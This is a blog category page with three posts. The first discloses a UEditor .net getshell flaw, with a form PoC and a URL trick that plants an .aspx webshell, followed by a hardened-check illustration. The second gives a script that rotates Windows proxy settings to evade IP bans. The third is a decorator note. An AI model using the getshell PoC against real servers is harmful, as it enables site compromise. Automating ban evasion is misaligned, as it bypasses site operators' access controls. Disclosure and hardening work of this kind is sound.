Articles in category 默认分类 (default category)

UEditor .net version 1.4.3.3 getshell

Published: 2018-08-03
Disclosed: 2018-08-21
Vulnerability type: logic flaw
Severity: high
Vulnerability ID: xianzhi-2018-08-16052905 (not accepted, rejected)
Tested version: latest on GitHub
Vulnerability details
https://github.com/fex-team/ueditor/blob/dev-1.5.0/net/App_Code/CrawlerHandler.cs
The only check the Crawler method performs on source[] is on the ContentType:

    if (response.ContentType.IndexOf("image") == -1)
    {
        State = "Url is not an image";
        return this;
    }

It never checks the file extension before saving the file to local disk, which leads to getshell.
POC:

<form action="http://xx.com/editor/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
    shell addr: <input name="source[]" type="text" />
    <input type="submit" value="Submit" />
</form>

For shell addr you can use a URL of the form http://www.xxx.com/xxx.jpg?.aspx pointing to an image that contains the webshell (so that the server returns a ContentType of image/xxx),
or http://www.xxxx.com/xxx.php?.aspx and set the ContentType yourself inside xxx.php.

The response is as follows:

{"state":"SUCCESS","list":[{"state":"SUCCESS","source":"http://www.xxxx.com//upload/Encyclopedias/201808/03/2018080300550278683.png?.aspx","url":"/upload/image/201808/03/6366885698033038502306919.aspx"}]}

Author: 索马里的乌贼
Link: https://www.jianshu.com/p/6dae608b617c
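The following is an added illustration (Python 3), not UEditor's code, of why the ContentType check alone is insufficient and what a hardened catcher does instead: the flawed version takes the stored extension from the fetched URL (query string included), while the hardened version picks the extension from an allowlist keyed by the declared media type and checks the body's leading bytes. The allowlist, magic-byte table, function names and sample URL are my own assumptions.

```python
import posixpath
from urllib.parse import urlsplit

# Assumed allowlist: declared media type -> extension used for the stored file,
# plus the leading bytes each type must start with.
ALLOWED_IMAGE_TYPES = {"image/jpeg": ".jpg", "image/png": ".png", "image/gif": ".gif"}
MAGIC = {".jpg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}


def naive_extension(source_url, content_type):
    """Reconstruction of the flawed logic: any type containing 'image' passes,
    and the stored extension is taken from the raw URL, query string included."""
    if "image" not in content_type:
        raise ValueError("Url is not an image")
    filename = source_url.rsplit("/", 1)[-1]        # 'xxx.jpg?.aspx'
    return posixpath.splitext(filename)[1]          # '.aspx', which IIS will execute


def hardened_extension(source_url, content_type, body):
    """Hardened logic: the extension comes from the allowlist, never from the
    URL; the declared type must match exactly and the body must match its magic."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    extension = ALLOWED_IMAGE_TYPES.get(media_type)
    if extension is None:
        raise ValueError("Content-Type not in image allowlist: %r" % content_type)
    if not body.startswith(MAGIC[extension]):
        raise ValueError("body does not look like %s" % media_type)
    parts = urlsplit(source_url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("unexpected source URL: %r" % source_url)
    return extension


if __name__ == "__main__":
    # Constructed input following the pattern in the write-up.
    url = "http://www.example.com/xxx.jpg?.aspx"
    print(naive_extension(url, "image/png"))                      # .aspx
    print(hardened_extension(url, "image/png", MAGIC[".png"]))    # .png
```

A polyglot file that is a valid image and also carries script still passes the magic check; the control that actually prevents getshell is that the stored name can never carry a server-executable extension.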

Reinventing the wheel: switching proxy IPs automatically with a Python script

One time while visiting a website, the site kept banning my IP. I was angry and helpless, and then an idea popped into my head: if I could change my own IP every so often, wouldn't that be great? So I went looking online. Most of what I found were scripts that add a proxy parameter to each request, and only a few did what I was after. My idea was not to switch the proxy inside a script's requests but to modify the Windows local proxy setting directly. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings is the registry key for the Windows proxy, and Python's _winreg module happens to be able to operate on the registry, which makes things a lot easier: crawl web pages for proxy IPs with Python, verify them and add the working ones to a list, then set the proxy every so often. I don't actually know Python, so I looked at a lot of examples and built a wheel. The code is as follows:

#!/usr/bin/python
# -*- coding:utf-8 -*-
import os, re, time
import requests
import urllib2
from bs4 import BeautifulSoup   # used by getfreeProxyIp(); the import was missing

# The request headers can be adjusted as you like
User_Agent = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'
header = {'User-Agent': User_Agent}


# Proxy fetcher, free-list version (scraped from the web, not great, QVQ)
def getfreeProxyIp():
    proxy = []
    for i in range(10):
        try:
            url = 'http://www.xicidaili.com/nn/' + str(i)
            req = urllib2.Request(url, headers=header)
            res = urllib2.urlopen(req).read()
            soup = BeautifulSoup(res, "html.parser")
            ips = soup.findAll('tr')
            for x in range(1, len(ips)):
                tds = ips[x].findAll("td")
                ip_temp = tds[1].contents[0] + ":" + tds[2].contents[0]
                proxy.append(ip_temp)
        except Exception:
            continue
    return proxy


# Proxy fetcher, scylla version (at least this one gave me proxies that work)
def getProxyIp():
    url = 'http://192.168.110.128:8899/api/v1/proxies'
    r = requests.get(url).json()
    proxy = []
    try:
        for i in r["proxies"]:
            ip = str(i['ip']) + ":" + str(i['port'])
            proxy.append(ip)
    except Exception:
        pass
    return proxy


# Validation: keep only the proxies that actually work
def testProxys(proxys):
    """ Test the proxys. """
    validProxys = []
    Url = "http://ip.chinaz.com/getip.aspx"
    for proxy in proxys:
        try:
            # set proxy
            proxy_handler = urllib2.ProxyHandler({'http': proxy, 'https': proxy})
            opener = urllib2.build_opener(proxy_handler)
            urllib2.install_opener(opener)
            # request website
            response = urllib2.urlopen(Url, timeout=5).read()

            # filter condition, matched to the test site's response body
            if re.findall('{ip:.*?,address:..*?}', response) != []:  # remove invalid proxy
                validProxys.append(proxy)
                print "%s" % proxy   # original used two %s for one value, which raised TypeError
        except Exception:
            continue

    return validProxys


# Proxy setter
def regIESettings(op, noLocal=False, ip='', pac=''):
    '''
    Build the .reg file content for the Windows proxy settings for the requested mode.
    DefaultConnectionSettings is a binary (REG_BINARY) value.
    '''
    if not op: return
    # In the proxy-address modes check that the address is valid
    # (empty is allowed, a malformed address is not)
    if 'Proxy' in op and not ip == '':
        if 1 > len(re.findall(r'([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\s*:{0,1}\s*([0-9]{1,5}){0,1}', ip)):
            print '---Unexpected IP Address:%s---' % ip
            return
    options = {'On': '0F', 'Off': '01', 'ProxyOnly': '03', 'PacOnly': '05', 'ProxyAndPac': '07', 'D': '09', 'DIP': '0B', 'DS': '0D'}
    if op == 'Off':
        reg_value = '46,00,00,00,00,00,00,00,01'
    else:
        switcher = options.get(op)
        if not switcher:
            print '\n---Unexpected Option. Please check the value after [-o]---\n'
            return
        # bypass list: 4-byte length prefix followed by the string; length 0 when absent
        # (the original template put three extra 00 bytes before the 07 length, misaligning it)
        skipLocal = '07,00,00,00,%s' % __toHex('<local>') if noLocal else '00,00,00,00'
        reg_value = '46,00,00,00,00,00,00,00,%(switcher)s,00,00,00,%(ipLen)s,00,00,00,%(ip)s%(skipLocal)s,21,00,00,00%(pac)s' % ({
            'switcher': switcher,
            'ipLen': __toHex(len(ip)),
            'ip': __toHex(ip) + ',' if ip else '',
            'skipLocal': skipLocal,
            'pac': ',' + __toHex(pac) if pac else ''})
    settings = 'Windows Registry Editor Version 5.00\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections]\n"DefaultConnectionSettings"=hex:%s' % reg_value
    # === write the .reg file and import it into the registry ===
    filePath = '%s\\DefaultConnectionSettings.reg' % os.getcwd()
    with open(filePath, 'w') as f:
        f.write(settings)
    cmd = 'reg import "%s"' % filePath
    result = os.popen(cmd)
    result.read()   # wait for reg.exe to finish
    return


def __toHex(obj):
    if obj == '': return ''
    elif obj == 0 or obj == '0' or obj == '00': return '00'
    if isinstance(obj, str):
        rehex = [str(hex(ord(s))).replace('0x', '') for s in obj]
        return ','.join(rehex)
    elif isinstance(obj, int):
        num = str(hex(obj)).replace('0x', '')
        return num if len(num) > 1 else '0' + num  # pad single digits: 7 -> 07, e -> 0e


def main():
    print '''

 .oooooo..o                          .     .o
d8P'    `Y8                        .o8   o888
Y88bo.      oooo    ooo  .oooo.o .o888oo  888  ooo. .oo.  .oo.
 `"Y8888o.   `88.  .8'  d88(  "8   888    888  `888P"Y88bP"Y88b
     `"Y88b   `88..8'   `"Y88b.    888    888   888   888   888
oo     .d8P    `888'    o.  )88b   888 .  888   888   888   888
8""88888P'      .8'     8""888P'   "888" o888o o888o o888o o888o
            .o..P'
            `Y8P'

    '''
    regIESettings(op='Off', ip='', pac='', noLocal=False)
    proxy = getProxyIp()
    validProxys = testProxys(proxy)
    if not validProxys:
        print 'No working proxy found'
        return
    print '---Start agent---'
    while True:
        for ip in validProxys:
            try:
                print 'Being used ' + ip
                regIESettings(op='ProxyOnly', ip=ip, pac='', noLocal=False)
                time.sleep(20)
            except Exception:
                print 'GG!'


if __name__ == '__main__':
    main()
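Since a silently rewritten DefaultConnectionSettings value is also what a proxy hijack looks like from the defender's side, here is an added decoder (Python 3, my own code, not part of the post) for the blob that the script above writes via reg import. It assumes the commonly documented layout: three little-endian u32 header fields (version 0x46, change counter, flags), then three u32-length-prefixed strings (proxy, bypass list, PAC URL); the flag names follow the script's options table, and the sample value is constructed.

```python
import struct

# Bits of the flags word, as used by the options table in the script
# (0x01 direct, 0x02 manual proxy, 0x04 PAC script, 0x08 auto-detect).
FLAG_NAMES = {0x02: "manual proxy", 0x04: "PAC script", 0x08: "auto-detect"}


def reg_hex_to_bytes(reg_hex):
    """Turn the 'hex:46,00,...' form written to the .reg file into bytes."""
    reg_hex = reg_hex.split("hex:", 1)[-1]               # drop the type prefix if present
    cleaned = reg_hex.replace("\\", "").replace("\n", "")  # .reg line continuations
    return bytes(int(b, 16) for b in cleaned.split(",") if b.strip())


def decode_connection_settings(blob):
    """Decode the blob into version, counter, flags, modes and the three strings.
    Assumed layout: three u32 header fields, then u32-length-prefixed strings
    (proxy, bypass list, PAC URL), all little-endian."""
    if len(blob) < 12:
        raise ValueError("blob shorter than the 12-byte header")
    version, counter, flags = struct.unpack_from("<III", blob, 0)
    result = {"version": version, "counter": counter, "flags": flags,
              "modes": [name for bit, name in FLAG_NAMES.items() if flags & bit]}
    offset = 12
    for field in ("proxy", "bypass", "pac"):
        if offset + 4 > len(blob):
            result[field] = None                          # field missing entirely
            continue
        (length,) = struct.unpack_from("<I", blob, offset)
        offset += 4
        if offset + length > len(blob):                   # declared length runs past the data
            result[field] = "<malformed: length %d exceeds data>" % length
            offset = len(blob)
            continue
        result[field] = blob[offset:offset + length].decode("ascii", "replace")
        offset += length
    return result


# Constructed sample: manual proxy 203.0.113.10:8080 (flags 0x03) with a <local> bypass.
SAMPLE_REG_HEX = ("hex:46,00,00,00,00,00,00,00,03,00,00,00,11,00,00,00,"
                  "32,30,33,2e,30,2e,31,31,33,2e,31,30,3a,38,30,38,30,"
                  "07,00,00,00,3c,6c,6f,63,61,6c,3e,00,00,00,00")

if __name__ == "__main__":
    print(decode_connection_settings(reg_hex_to_bytes(SAMPLE_REG_HEX)))
```

Fed the value the script writes for ProxyOnly with an empty PAC, the decoder reports the last field as malformed, because the script's template ends with a length of 0x21 followed by no PAC bytes.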
    

There is still room to improve this; onward.

Some Flask puzzles and notes

1. The @ decorator
@app.route('/')
There is an @ symbol in front of it. So what does this @ mean?
Other people's blogs describe it like this:
'@' is used as a function decorator; it can be applied to a function inside a module or class definition,
it appears on the line before the function definition and is not allowed on the same line as the definition.
A decorator is itself a function: it takes the decorated function as an argument and returns a decorated function of the same name, or some other callable.

def funA(a):
    print 'funA'

def funB(b):
    print 'funB'

# Decorators are applied at definition time, innermost first: funB(funC) runs
# and returns None, then funA(None) runs; the name funC ends up bound to None.
@funA
@funB
def funC():
    print 'funC'

result:

================================ RESTART ================================

funB
funA

So the whole program executes as funA(funB(funC)).
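To tie this back to @app.route, here is an added example (my own code, not Flask's) of a minimal router in the same shape: route('/') returns the real decorator, which records the function in a table and hands it back unchanged, so the view keeps its name, unlike funA and funB above, which return None. A second decorator, log_calls, shows the wrapping style and how the two compose innermost first. The Router class and all names are assumptions.

```python
import functools


class Router:
    """Tiny stand-in for the part of app.route that registers views."""

    def __init__(self):
        self.rules = {}

    def route(self, path):
        """route('/x') returns the actual decorator; that is what @ applies."""
        def decorator(func):
            self.rules[path] = func
            return func                 # hand the original function back unchanged
        return decorator

    def dispatch(self, path):
        view = self.rules.get(path)
        return view() if view else "404 Not Found"


def log_calls(func):
    """A wrapping decorator: returns a new callable that calls the original."""
    @functools.wraps(func)              # keep __name__ and __doc__ of the original
    def wrapper(*args, **kwargs):
        wrapper.calls += 1
        return func(*args, **kwargs)
    wrapper.calls = 0
    return wrapper


app = Router()


@app.route("/")
@log_calls
def index():
    return "hello"
# Equivalent to: index = app.route("/")(log_calls(index)), innermost first.


if __name__ == "__main__":
    print(app.dispatch("/"), app.dispatch("/missing"), index.__name__, index.calls)
```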